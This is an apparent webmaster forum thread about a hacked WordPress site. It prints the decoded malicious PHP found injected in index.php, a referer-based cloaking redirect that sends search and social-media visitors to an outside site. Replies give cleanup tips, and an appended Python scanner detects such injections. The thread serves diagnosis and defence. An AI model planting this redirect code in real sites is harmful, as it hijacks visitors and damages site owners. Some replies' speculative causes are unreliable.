I bought a URL for my girlfriend (her-name.com), built her a website for Christmas. But she searched for it in Google and it redirects to some Polish site:
Code: http://www.bee.**/index.html
But when I visit the URL directly, it goes to her site? WTF is happening? Has someone hacked something somewhere? Help needed ASAP
Checked. Nothing out of the ordinary.
Code:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . //index.php [L]
</IfModule>
# END WordPress
In cPanel, search for "redirects", and in your index.php/.html search for
<script location="http://blabla.com">
OR
<script language="JavaScript"><!-- window.location.href="http://blabla.com"; // --></script>
OR
<META HTTP-EQUIV="refresh" CONTENT="sekunden;URL=http://blabla.com">
I found it. I found some base64 code in the top of my WordPress index.php. It decoded to:
Code:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        // Fires only when the visitor arrives from one of these referrers
        if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler")
            or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport")
            or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru")
            or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly")
            or stristr($referer,"************")
            or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer)
            or preg_match ("/google\.(.*?)\/url/",$referer)
            or stristr($referer,"myspace.com") or stristr($referer,"facebook.com")
            or stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                // Direct visits (no matching referer) never reach this redirect
                header("Location: http://contento.bee.**/");
                exit();
            }
        }
    }
}
BASTARD! lol... Now I have to go check every index.php/html I got on my server :headache:
Had a similar thing happen on my VPS, all my sites under one account got affected. Basically they hid redirects at the bottom of the .htaccess file (double-check your .htaccess file to be sure there is nothing at the bottom of the file and it hasn't been modified recently). Google SERPs never recovered for about 15 of my sites despite reinclusion requests. Bastards.
Yeah, just going through all the indexes on my server... luckily the ones affected don't seem to be ones that rely on search results.
Maybe 'bug' = 'loophole'. WordPress has a history of being hacked into. There are some good tips for improving WP security here:
Code: http://www.problogdesign.com/wordpress/11-best-ways-to-improve-wordpress-security/
Code: http://www.blackhatworld.com/blackhat-seo/templates-themes/374678-amazing-tools-detecting-hacked-themes.html
Also, remember to do backups.
Ardley216, a few questions that would help others out.
* Were you using a cracked, nulled or free version of a WordPress theme?
* Or, did you otherwise acquire your theme from a potentially dangerous source?
* Had you performed all of the stated updates for WP?
Just curious as to how your site was breached. Glad you figured things out.
WordPress is probably the largest hole into your server unless you are constantly updating. Leave one unupdated for a bit and your whole server will be compromised. It's getting worse as well... I don't ever recommend using it.
The code you have is maybe the blackhole exploit. I believe you are using FileZilla as FTP server. Well, basically, you may have a virus on your computer which is stealing the XML which contains all your FTP credentials. Then, it automatically connects to place this curl/php/js code in all your index.php. If you don't do anything quick and if this is the black hole exploit, your cPanel files could even be corrupted and you'll be good to do a clean reinstall. This thing is literally a pain in the ass to remove. With a hosting customer of mine we spent ages to find the proper antivirus which would block the exploit but not even removing it. You may want to go with AVG free edition. Another lead would also be the source of your WordPress theme.
My account was also hacked. What I learned while cleaning my websites is that the code is placed not just in index.php, but practically in ALL .php files of the WordPress install. What I ended up doing is compressing all the files, downloading the zip to my computer and then cleaning all PHP files with "search and replace" software. On every website there were at least 50 places with the code inserted! The other option is to do a clean re-install. I could not do this because of some custom code on my websites. Glad if this helps.
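An added example, not code from any poster in this thread: a Python scan of a site tree for the two infections described above, a base64 string literal in a .php file that decodes to a referer-based `header("Location: ...")` redirect, and a referer condition in .htaccess. The `eval(base64_decode(...))` wrapper in the sample, the 80-character threshold, the `RewriteCond` form of the .htaccess variant and all function names are assumptions.

```python
import base64, binascii, os, re, sys

# Quoted run of 80+ base64 characters; the 80 threshold is an assumption.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/=\s]{80,})["']""")
# Strings present in the decoded payload quoted in the thread.
PAYLOAD_MARKERS = ("HTTP_REFERER", "header(", "Location:")
# Assumed .htaccess variant; hotlink-protection rules match too, so review hits by hand.
HTACCESS_REFERER = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I | re.M)

# Constructed sample, not the thread's blob; the eval() wrapper is an assumption.
SAMPLE_PAYLOAD = ('if (stristr($_SERVER["HTTP_REFERER"],"google")) '
                  'header("Location: http://example.invalid/");')
SAMPLE_PHP = '<?php eval(base64_decode("%s")); ?>\n<?php // theme code' % (
    base64.b64encode(SAMPLE_PAYLOAD.encode()).decode())

def decoded_literals(text):
    """Yield the plaintext of every quoted literal that is valid base64."""
    for match in B64_LITERAL.finditer(text):
        blob = re.sub(r"\s+", "", match.group(1))
        try:
            yield base64.b64decode(blob, validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            continue  # not base64 after all, e.g. a long ordinary string

def scan_text(name, text):
    """Return a list of findings for one file's contents."""
    findings = []
    if name.lower().endswith(".php"):
        for plain in decoded_literals(text):
            if all(marker in plain for marker in PAYLOAD_MARKERS):
                findings.append("base64 literal decodes to a referer-based redirect")
    elif os.path.basename(name) == ".htaccess" and HTACCESS_REFERER.search(text):
        findings.append("RewriteCond on HTTP_REFERER")
    return findings

def scan_tree(root):
    report = {}  # path -> findings, for every .php and .htaccess file under root
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(".php") or fn == ".htaccess":
                path = os.path.join(dirpath, fn)
                with open(path, encoding="latin-1") as fh:
                    found = scan_text(path, fh.read())
                if found:
                    report[path] = found
    return report

if __name__ == "__main__":
    print(scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."))
```

Run it against a downloaded copy of the site; a clean result only rules out these two patterns, not other injected code.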